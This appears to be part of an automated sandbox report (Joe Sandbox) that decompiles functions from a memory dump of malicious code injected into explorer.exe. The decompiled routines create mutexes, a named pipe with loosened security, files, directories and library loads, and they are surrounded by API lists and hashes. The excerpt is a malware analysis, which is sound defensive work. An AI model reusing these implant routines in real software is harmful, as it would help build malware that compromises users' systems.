0x000ca6c9
0x000ca6cd
0x000ca757
0x000ca757
0x000ca759
0x000ca75b
0x000ca75d
0x000ca75d
0x000ca6d3
0x000ca6e1
0x000ca6e5
0x000ca73d
0x000ca73d
0x000ca743
0x000ca748
0x000ca750
0x000ca756
0x00000000
0x000ca748
0x000ca6e7
0x000ca6f0
0x000ca6f2
0x000ca6f8
0x00000000
0x00000000
0x000ca6fc
0x000ca6ff
0x000ca700
0x000ca706
0x000ca707
0x000ca708
0x000ca72d
0x000ca70f
0x000ca761
0x00000000
0x00000000
0x000ca763
0x000ca766
0x000ca76c
0x000ca76e
0x000ca76e
0x000ca776
0x000ca779
0x00000000
0x000ca779
0x000ca717
0x000ca71a
0x000ca71e
0x000ca720
0x000ca723
0x000ca728
0x000ca72c
0x000ca72c
0x00000000
0x000ca72d
0x000ca6bb
0x00000000

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615), ref: 000CA733
CloseHandle.KERNELBASE(00000000,?,000CFA56,00000000,000CF8B5,000EEFE0,000DB990,00000000,000DB990,00000000,00000000,00000615,0000034A,00000000,014CFD20,00000400), ref: 000CA776

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CloseFileHandleRead
String ID:
API String ID: 2331702139-0
Opcode ID: 7e20f7628843a25b4c6b833c6a6da042d89b600705db7ea788ea2ff22ef9d7ff
Instruction ID: fbc89baa7441c349636ec3da61cff064576fdbb464b599ad603ef7b6ce517cfa
Opcode Fuzzy Hash: 7e20f7628843a25b4c6b833c6a6da042d89b600705db7ea788ea2ff22ef9d7ff
Instruction Fuzzy Hash: 77217A76A05209ABDB50CF64CC84FAE77FCAB09748F10816AF905CB242E730D9408BA1

Uniqueness

Uniqueness Score: -1.00%

Function 000C153B, Relevance: 3.1, APIs: 2, Instructions: 69
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E000C153B(void* __ecx, void* __edx) {
				void* _v8;
				void* _t3;
				signed int _t4;
				intOrPtr _t7;
				signed int _t9;
				intOrPtr _t10;
				void* _t24;

				_push(__ecx);
				_t3 = CreateMutexA(0, 0, 0);
				 *0xde6f4 = _t3;
				if(_t3 == 0) {
					L11:
					_t4 = _t3 | 0xffffffff;
					__eflags = _t4;
				} else {
					_t3 = CreateMutexA(0, 0, 0);
					 *0xde6dc = _t3;
					if(_t3 == 0) {
						goto L11;
					} else {
						_t3 = E000C1080(0x4ac);
						_v8 = _t3;
						if(_t3 == 0) {
							goto L11;
						} else {
							 *0xde6e8 = E000C91A6(_t3, 0);
							E000C85C2( &_v8);
							_t7 = E000C8604(0x100);
							 *0xde6f0 = _t7;
							if(_t7 != 0) {
								 *0xde6fc = 0;
								_t9 = E000C8604(0x401);
								 *0xde6d4 = _t9;
								__eflags = _t9;
								if(_t9 != 0) {
									__eflags =  *0xde6c0; // 0x0
									if(__eflags == 0) {
										E000D15B6(E000C8202, 0xc820b);
									}
									_push(0x61e);
									_t24 = 8;
									_t10 = E000CE1BC(0xdbd28, _t24); // executed
									 *0xde6a0 = _t10;
									_t4 = 0;
								} else {
									_push(0xfffffffc);
									goto L5;
								}
							} else {
								_push(0xfffffffe);
								L5:
								_pop(_t4);
							}
						}
					}
				}
				return _t4;
			}

0x000c153e
0x000c1545
0x000c154b
0x000c1552
0x000c1607
0x000c1607
0x000c1607
0x000c1558
0x000c155b
0x000c1561
0x000c1568
0x00000000
0x000c156e
0x000c1573
0x000c1578
0x000c157d
0x00000000
0x000c1583
0x000c158f
0x000c1594
0x000c159e
0x000c15a3
0x000c15ab
0x000c15b9
0x000c15bf
0x000c15c4
0x000c15ca
0x000c15cc
0x000c15d2
0x000c15d8
0x000c15e4
0x000c15ea
0x000c15eb
0x000c15f2
0x000c15f8
0x000c15fd
0x000c1602
0x000c15ce
0x000c15ce
0x00000000
0x000c15ce
0x000c15ad
0x000c15ad
0x000c15af
0x000c15af
0x000c15af
0x000c15ab
0x000c157d
0x000c1568
0x000c160c

APIs

CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000C5707), ref: 000C1545
CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,000C5707), ref: 000C155B

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateMutex$AllocateHeap
String ID:
API String ID: 704353917-0
Opcode ID: c0b3614160b9c0e721e732cfd7821122ad61b31e0c42afef05f413faf91f14b0
Instruction ID: 6e75c71e50a5731b0130a832f490ca52ea6bb9a9d023da2c25c43666a8ab9d4c
Opcode Fuzzy Hash: c0b3614160b9c0e721e732cfd7821122ad61b31e0c42afef05f413faf91f14b0
Instruction Fuzzy Hash: FD11B970605682AAF760AB75EC05FAE3BE4DBD27A0724422FE911C92D2EF74C4008738

Uniqueness

Uniqueness Score: -1.00%

Function 000CBC7A, Relevance: 3.1, APIs: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E000CBC7A(void* __ecx, void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _t18;
				intOrPtr _t19;
				intOrPtr _t27;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t38;
				char _t39;

				_t39 = 0;
				_t38 =  *0xde674; // 0x1fc
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v16 = 0;
				_t18 = E000C95E1(__ecx, 0x84b);
				_push(0);
				_v24 = _t18;
				_push( &_v8);
				_push(1);
				_push(_t18);
				_t19 =  *0xde68c; // 0x14cfab8, executed
				if( *((intOrPtr*)(_t19 + 0x84))() != 0) {
					_push( &_v16);
					_push( &_v12);
					_push( &_v20);
					_t27 =  *0xde68c; // 0x14cfab8
					_push(_v8);
					if( *((intOrPtr*)(_t27 + 0x88))() != 0) {
						_push(_v12);
						_t30 =  *0xde68c; // 0x14cfab8
						_push(0);
						_push(0);
						_push(0);
						_push(0x10);
						_push(6);
						_push(_t38); // executed
						if( *((intOrPtr*)(_t30 + 0x8c))() == 0) {
							_t39 = 1;
						}
					}
					_t36 =  *0xde68c; // 0x14cfab8
					 *((intOrPtr*)(_t36 + 0x10))(_v8);
				}
				E000C85D5( &_v24);
				return _t39;
			}

0x000cbc81
0x000cbc84
0x000cbc8f
0x000cbc92
0x000cbc95
0x000cbc98
0x000cbc9b
0x000cbca1
0x000cbca5
0x000cbca8
0x000cbca9
0x000cbcab
0x000cbcac
0x000cbcb9
0x000cbcbe
0x000cbcc2
0x000cbcc6
0x000cbcc7
0x000cbccc
0x000cbcd7
0x000cbcd9
0x000cbcdc
0x000cbce1
0x000cbce2
0x000cbce3
0x000cbce4
0x000cbce6
0x000cbce8
0x000cbcf1
0x000cbcf3
0x000cbcf3
0x000cbcf1
0x000cbcf4
0x000cbcfd
0x000cbcfd
0x000cbd04
0x000cbd0f

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000000,?,000C3268,?,?,00000000,?,?,?,000C5721), ref: 000CBCB1
SetSecurityInfo.ADVAPI32(000001FC,00000006,00000010,00000000,00000000,00000000,?,?,000C3268,?,?,00000000,?,?,?,000C5721), ref: 000CBCE9

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: Security$Descriptor$ConvertInfoString
String ID:
API String ID: 3187949549-0
Opcode ID: 82f6e6e030ddb7c3949cedf39d3bd321613d4213fc84a8a5e000ef028c174823
Instruction ID: a8e78ae5fe899e9e6dcb65718c11a878b9f3e22039a9cadb435a55c152528d81
Opcode Fuzzy Hash: 82f6e6e030ddb7c3949cedf39d3bd321613d4213fc84a8a5e000ef028c174823
Instruction Fuzzy Hash: 25112871A01119ABDB10EF95DC89EEEBBBCEF04740F1040AAB905E7191DB749A01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 000CE1BC, Relevance: 3.0, APIs: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E000CE1BC(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v8;
				char _t5;
				struct HINSTANCE__* _t7;
				void* _t10;
				void* _t12;
				void* _t22;
				void* _t25;

				_push(__ecx);
				_t12 = __ecx;
				_t22 = __edx;
				_t5 = E000C95C7(_a4);
				_t25 = 0;
				_v8 = _t5;
				_push(_t5);
				if(_a4 != 0x7c3) {
					_t7 = LoadLibraryA(); // executed
				} else {
					_t7 = GetModuleHandleA();
				}
				if(_t7 != 0) {
					_t10 = E000CE171(_t12, _t22, _t7); // executed
					_t25 = _t10;
				}
				E000C85C2( &_v8);
				return _t25;
			}

0x000ce1bf
0x000ce1c2
0x000ce1c8
0x000ce1ca
0x000ce1cf
0x000ce1d1
0x000ce1db
0x000ce1dc
0x000ce1eb
0x000ce1de
0x000ce1de
0x000ce1de
0x000ce1ef
0x000ce1f6
0x000ce1fc
0x000ce1fc
0x000ce201
0x000ce20c

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1DE
LoadLibraryA.KERNEL32(00000000,00000000,00000001,?,000DBA28), ref: 000CE1EB

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID:
API String ID: 4133054770-0
Opcode ID: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
Instruction ID: b621e06e66ccbc4fe0a1b5701ac5766a354ec37475444ef5371c80a333f06dd2
Opcode Fuzzy Hash: df837670c524f01323393a6d0ba1e5e31ea28cf0f73fd4d437330576f8cc777f
Instruction Fuzzy Hash: 2EF0EC32700114ABD744ABADDC85D9EB7ED9F587A0714803EFC06D7151DEB0DE0087A0

Uniqueness

Uniqueness Score: -1.00%

Function 000C2C8F, Relevance: 1.6, APIs: 1, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E000C2C8F(void* __ecx, void* __edx, void* __eflags, void* __fp0) {
				WCHAR* _v8;
				char _v12;
				char _v44;
				char _v564;
				char _v1084;
				void* __esi;
				void* _t23;
				struct _SECURITY_ATTRIBUTES* _t25;
				int _t27;
				char _t32;
				char _t38;
				intOrPtr _t39;
				void* _t40;
				WCHAR* _t41;
				void* _t54;
				char* _t60;
				char* _t63;
				void* _t70;
				WCHAR* _t71;
				intOrPtr* _t73;

				_t70 = __ecx;
				_push(__ecx);
				E000CB700(__edx,  &_v44, __eflags, __fp0);
				_t52 = _t70;
				if(E000CBB8D(_t70) == 0) {
					_t23 = E000C2BA4( &_v1084, _t70, 0x104); // executed
					_pop(_t54);
					__eflags = _t23;
					if(__eflags == 0) {
						_t71 = E000C2C64( &_v1084, __eflags);
					} else {
						E000CB012(_t54,  &_v564); // executed
						_t32 = E000C109A(_t54, 0x375);
						_push(0);
						_v12 = _t32;
						_push( &_v44);
						_t60 = "\\";
						_push(_t60);
						_push(_t32);
						_push(_t60);
						_push( &_v564);
						_push(_t60);
						_t71 = E000C92E5( &_v1084);
						E000C85D5( &_v12);
					}
				} else {
					_t38 = E000C109A(_t52, 0x4e0);
					 *_t73 = 0x104;
					_v12 = _t38;
					_t39 =  *0xde684; // 0x14cf8f0
					_t40 =  *((intOrPtr*)(_t39 + 0xe0))(_t38,  &_v564);
					_t78 = _t40;
					if(_t40 != 0) {
						_t41 = E000C109A( &_v564, 0x375);
						_push(0);
						_v8 = _t41;
						_push( &_v44);
						_t63 = "\\";
						_push(_t63);
						_push(_t41);
						_push(_t63);
						_t71 = E000C92E5( &_v564);
						E000C85D5( &_v8);
					} else {
						_t71 = E000C2C64( &_v44, _t78);
					}
					E000C85D5( &_v12);
				}
				_v8 = _t71;
				_t25 = E000CB269(_t71);
				if(_t25 == 0) {
					_t27 = CreateDirectoryW(_t71, _t25); // executed
					if(_t27 == 0 || E000CB269(_t71) == 0) {
						E000C861A( &_v8, 0xfffffffe);
						_t71 = _v8;
					}
				}
				return _t71;
			}

0x000c2c9e
0x000c2ca0
0x000c2ca3
0x000c2ca9
0x000c2cb2
0x000c2d36
0x000c2d3b
0x000c2d3c
0x000c2d3e
0x000c2d8f
0x000c2d40
0x000c2d46
0x000c2d50
0x000c2d55
0x000c2d5a
0x000c2d5d
0x000c2d5e
0x000c2d63
0x000c2d64
0x000c2d65
0x000c2d6c
0x000c2d6d
0x000c2d7a
0x000c2d80
0x000c2d85
0x000c2cb4
0x000c2cb9
0x000c2cbe
0x000c2ccc
0x000c2cd0
0x000c2cd5
0x000c2cdb
0x000c2cdd
0x000c2ced
0x000c2cf2
0x000c2cf7
0x000c2cfa
0x000c2cfb
0x000c2d00
0x000c2d01
0x000c2d02
0x000c2d0f
0x000c2d15
0x000c2cdf
0x000c2ce4
0x000c2ce4
0x000c2d21
0x000c2d26
0x000c2d93
0x000c2d96
0x000c2d9d
0x000c2da1
0x000c2da9
0x000c2dbc
0x000c2dc1
0x000c2dc5
0x000c2da9
0x000c2dca

APIs

CreateDirectoryW.KERNELBASE(00000000,00000000,00000000), ref: 000C2DA1

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateDirectory
String ID:
API String ID: 4241100979-0
Opcode ID: ea5025933a285b4d1b86bea7e61879e591dfe4e52afb863ab189a32f1de6b3f4
Instruction ID: edd7b77d9a22e79d699e63e24eebf5e62a2d4ad44de2fba8ddeb630291c3af95
Opcode Fuzzy Hash: ea5025933a285b4d1b86bea7e61879e591dfe4e52afb863ab189a32f1de6b3f4
Instruction Fuzzy Hash: E13192B1910214AADB24FBA48C96FEE73ACAB04310F14415EF906E7182EF749F408BB4

Uniqueness

Uniqueness Score: -1.00%

Function 000C31C2, Relevance: 1.6, APIs: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E000C31C2(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0xde688; // 0xf0000
				_t10 = E000CC292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E000C8604(0x80000); // executed
					 *0xde724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E000CBD10(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0xde674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E000CBC7A( &_v20, _t38); // executed
							_t18 = E000C98EE(E000C32A1, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0xde684; // 0x14cf8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0xde674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0xde674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E000C861A( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}

0x000c31c2
0x000c31c8
0x000c31d8
0x000c31dd
0x000c31df
0x000c31e4
0x000c31f5
0x000c31fa
0x000c3200
0x000c3202
0x000c320b
0x000c3210
0x000c3213
0x000c3215
0x000c3217
0x000c3219
0x000c321a
0x000c321a
0x000c3227
0x000c322a
0x000c322f
0x000c3249
0x000c324f
0x000c3254
0x000c3257
0x000c3263
0x000c3271
0x000c3278
0x000c327a
0x00000000
0x00000000
0x000c327c
0x000c3287
0x000c328a
0x00000000
0x000c3259
0x000c3259
0x000c325f
0x000c328c
0x000c328c
0x000c328d
0x000c3293
0x00000000
0x000c329c
0x000c3257
0x000c3204
0x00000000
0x000c3204
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d0f7e634e6a7c059e8a9e65dd17be2924dbfbe23cb9281b23f4b3114784c020
Instruction ID: d13159e9ccd9f4dddc0a4346f52e0233d29fb46ca893f90048703841fd8101b3
Opcode Fuzzy Hash: 7d0f7e634e6a7c059e8a9e65dd17be2924dbfbe23cb9281b23f4b3114784c020
Instruction Fuzzy Hash: 6D21F8726051119AEB10BBB8EC45FAE37A8EB55374F20432EF525D71D1DE3085008761

Uniqueness

Uniqueness Score: -1.00%

Function 000C5AFF, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C5AFF(intOrPtr __edx, void* __fp0) {
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				intOrPtr* _t22;
				intOrPtr _t23;
				signed int _t30;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				signed int _t47;
				void* _t55;

				_t55 = __fp0;
				_t45 = __edx;
				_t47 = 0;
				_t22 = E000C8604(0x14);
				_t38 =  *0xde688; // 0xf0000
				_t46 = _t22;
				if( *((short*)(_t38 + 0x22a)) == 0x3a) {
					_v36 =  *((intOrPtr*)(_t38 + 0x228));
					_v34 =  *((intOrPtr*)(_t38 + 0x22a));
					_v32 =  *((intOrPtr*)(_t38 + 0x22c));
					_v30 = 0;
					GetDriveTypeW( &_v36); // executed
				}
				 *_t46 = 2;
				 *(_t46 + 4) = _t47;
				_t23 =  *0xde688; // 0xf0000
				 *((intOrPtr*)(_t46 + 8)) =  *((intOrPtr*)(_t23 + 0x224));
				_t40 = E000C5A7B( *((intOrPtr*)(_t23 + 0x224)), _t45, _t55);
				 *((intOrPtr*)(_t46 + 0xc)) = _t40;
				if(_t40 == 0) {
					L9:
					if(E000C2DCB() == 0) {
						goto L11;
					} else {
						_t47 = _t47 | 0xffffffff;
					}
				} else {
					_t45 =  *_t40;
					_t30 = _t47;
					if(_t45 == 0) {
						goto L9;
					} else {
						_t44 =  *((intOrPtr*)(_t40 + 4));
						while( *((intOrPtr*)(_t44 + _t30 * 8)) != 0x3b) {
							_t30 = _t30 + 1;
							if(_t30 < _t45) {
								continue;
							} else {
								goto L9;
							}
							goto L12;
						}
						if( *((intOrPtr*)(_t44 + 4 + _t30 * 8)) != _t47) {
							L11:
							E000C4D6D(_t46, _t45, _t55);
						} else {
							goto L9;
						}
					}
				}
				L12:
				E000CA39E();
				E000CA39E();
				return _t47;
			}

0x000c5aff
0x000c5aff
0x000c5b0a
0x000c5b0c
0x000c5b12
0x000c5b18
0x000c5b22
0x000c5b2b
0x000c5b36
0x000c5b41
0x000c5b47
0x000c5b4f
0x000c5b4f
0x000c5b55
0x000c5b5b
0x000c5b5e
0x000c5b69
0x000c5b71
0x000c5b73
0x000c5b78
0x000c5b98
0x000c5b9f
0x00000000
0x000c5ba1
0x000c5ba1
0x000c5ba1
0x000c5b7a
0x000c5b7a
0x000c5b7c
0x000c5b80
0x00000000
0x000c5b82
0x000c5b82
0x000c5b85
0x000c5b8b
0x000c5b8e
0x00000000
0x000c5b90
0x00000000
0x000c5b90
0x00000000
0x000c5b8e
0x000c5b96
0x000c5ba6
0x000c5ba8
0x00000000
0x00000000
0x00000000
0x000c5b96
0x000c5b80
0x000c5bad
0x000c5bb0
0x000c5bb8
0x000c5bc3

APIs

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

GetDriveTypeW.KERNELBASE(?), ref: 000C5B4F

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocateDriveHeapType
String ID:
API String ID: 414167704-0
Opcode ID: 99ddb7e7a8e465f67db72aa8efe03724478429e399e3439fdb29f9c17417f0e3
Instruction ID: e8a148116833502842f1c4452d30bb54f46fd039dd188a520077a7abc4d715bb
Opcode Fuzzy Hash: 99ddb7e7a8e465f67db72aa8efe03724478429e399e3439fdb29f9c17417f0e3
Instruction Fuzzy Hash: EB21EB3C6006069BC714AFA4DC44FADB7B4FF48365B24812DE41587292EB31AC82CB95

Uniqueness

Uniqueness Score: -1.00%

Function 000CE450, Relevance: 1.5, APIs: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E000CE450(void* __ecx, void* __edx) {
				char _v8;
				intOrPtr* _t5;
				intOrPtr _t10;
				intOrPtr* _t11;
				void* _t12;

				_push(__ecx);
				_t5 =  *0xde6b0; // 0x14af1c0
				if( *_t5 == 0) {
					_v8 = E000C95C7(0x2a7);
					 *0xde788 = E000C91A6(_t6, 0);
					E000C85C2( &_v8);
					goto L4;
				} else {
					_v8 = 0x100;
					_t10 = E000C8604(0x101);
					 *0xde788 = _t10;
					_t11 =  *0xde6b0; // 0x14af1c0
					_t12 =  *_t11(0, _t10,  &_v8); // executed
					if(_t12 == 0) {
						L4:
						return 0;
					} else {
						return E000C861A(0xde788, 0xffffffff) | 0xffffffff;
					}
				}
			}

0x000ce453
0x000ce454
0x000ce45c
0x000ce4a6
0x000ce4b3
0x000ce4b8
0x00000000
0x000ce45e
0x000ce463
0x000ce46a
0x000ce473
0x000ce47a
0x000ce481
0x000ce485
0x000ce4bd
0x000ce4c0
0x000ce487
0x000ce499
0x000ce499
0x000ce485

APIs

Part of subcall function 000C8604: RtlAllocateHeap.NTDLL(00000008,?,?,000C8F84,00000100,?,000C5FCB), ref: 000C8612

ObtainUserAgentString.URLMON(00000000,00000000,00000100,00000100,?,000CE4F7), ref: 000CE481

Part of subcall function 000C861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 000C8660

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: Heap$AgentAllocateFreeObtainStringUser
String ID:
API String ID: 471734292-0
Opcode ID: 6c9bbffbe4edb7a4ff9adc0bce118c51f14637568a92d6f597577bcbae2cc5cb
Instruction ID: 8079f1387fde3651cf51c068454c49593d8a393480f3ea93dffd8e4335a106f5
Opcode Fuzzy Hash: 6c9bbffbe4edb7a4ff9adc0bce118c51f14637568a92d6f597577bcbae2cc5cb
Instruction Fuzzy Hash: 7DF06230609240EBF788EBB4DC4AF9D77E4AB15364F24425DE415DB2D2EFB499409628

Uniqueness

Uniqueness Score: -1.00%

Function 000CA65C, Relevance: 1.5, APIs: 1, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000CA65C(void* __ecx, void* __edx, intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _t13;
				void* _t21;
				void* _t23;
				void* _t26;

				_t23 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t26 = 0;
				_v12 = __ecx;
				_t21 = __edx;
				if(_a4 == 0) {
					L3:
					_t13 = 1;
				} else {
					while(1) {
						_v8 = _v8 & 0x00000000;
						if(WriteFile(_t23, _t26 + _t21, _a4 - _t26,  &_v8, 0) == 0) {
							break;
						}
						_t26 = _t26 + _v8;
						_t23 = _v12;
						if(_t26 < _a4) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					_t13 = 0;
				}
				L4:
				return _t13;
			}

0x000ca65c
0x000ca65f
0x000ca660
0x000ca663
0x000ca665
0x000ca668
0x000ca66d
0x000ca69e
0x000ca6a0
0x000ca66f
0x000ca66f
0x000ca66f
0x000ca691
0x00000000
0x00000000
0x000ca693
0x000ca696
0x000ca69c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x000ca69c
0x000ca6a5
0x000ca6a5
0x000ca6a1
0x000ca6a4

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,000C8F51,?), ref: 000CA689

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
Instruction ID: e0b687cbe582983185d491bef9ae05b3aa73082748710466be92ceb60ada6772
Opcode Fuzzy Hash: 551876cd6162cdc5b2e4ca6e23b02dab5f3737e8c785ecba328694066dc40e87
Instruction Fuzzy Hash: E7F01D72A10118BFDB10DFA8C884FAE77ECEB05785F144169B505E7140D670EE4097A1

Uniqueness

Uniqueness Score: -1.00%

Function 000CA5F7, Relevance: 1.5, APIs: 1, Instructions: 32
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000CA5F7(WCHAR* __ecx, long __edx) {
				intOrPtr _t6;
				long _t12;
				void* _t13;

				_t12 = __edx;
				_t13 = CreateFileW(__ecx, 0x40000000, 0, 0, __edx, 0x80, 0);
				if(_t13 != 0xffffffff) {
					if(_t12 == 4) {
						_t6 =  *0xde684; // 0x14cf8f0
						 *((intOrPtr*)(_t6 + 0x80))(_t13, 0, 0, 2);
					}
					return _t13;
				}
				return 0;
			}

0x000ca601
0x000ca615
0x000ca61a
0x000ca623
0x000ca625
0x000ca62f
0x000ca62f
0x00000000
0x000ca635
0x00000000

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,000C8F39), ref: 000CA612

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
Instruction ID: 2e7d981304f5d219390b7102899e7dea75ca9fc1daa0b5ba6031beeb52369677
Opcode Fuzzy Hash: a9560a278b99c07b65f62764df9b74b27a49f372050d70bf07676ec071247da3
Instruction Fuzzy Hash: E6E09AB23020187EFA202B689CC8F7B26ACE79A7F9F060239FA51C71E0C6208C014271

Uniqueness

Uniqueness Score: -1.00%

Function 000C3017, Relevance: 1.5, APIs: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000C3017() {
				signed int _t4;
				intOrPtr _t8;
				void* _t11;

				_t4 =  *0xde688; // 0xf0000
				if( *((intOrPtr*)(_t4 + 0x214)) != 3) {
					L3:
					return _t4 | 0xffffffff;
				} else {
					_t4 = E000CBB20(_t11);
					if(_t4 != 0) {
						goto L3;
					} else {
						AllocConsole();
						_t8 =  *0xde684; // 0x14cf8f0
						 *((intOrPtr*)(_t8 + 0x118))(E000C2FF7, 1);
						return 0;
					}
				}
			}

0x000c3017
0x000c3023
0x000c304e
0x000c3051
0x000c3025
0x000c3025
0x000c302c
0x00000000
0x000c302e
0x000c3033
0x000c3039
0x000c3045
0x000c304d
0x000c304d
0x000c302c

APIs

AllocConsole.KERNEL32 ref: 000C3033

Memory Dump Source

Source File: 0000000E.00000002.888219499.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_c0000_explorer.jbxd

Yara matches

Similarity

API ID: AllocConsole
String ID:
API String ID: 4167703944-0
Opcode ID: 2e30d3ae640417c316c0b46691cdc600fa2e0baa99ae763e0b8977d3442c29b1
Instruction ID: e3d5e7fce8a631e6da497200553c8db31a05f735526e739650b2f22a81ba6811
Opcode Fuzzy Hash: 2e30d3ae640417c316c0b46691cdc600fa2e0baa99ae763e0b8977d3442c29b1
Instruction Fuzzy Hash: D3E012312111058BDA10A774CD8AFD833E0AF28751F9641B4F614CE0E2D7B4C941C722

Uniqueness

Uniqueness Score: -1.00%

Function 000CA63B, Relevance: 1.5, APIs: 1, Instructions: 15
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E000CA63B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
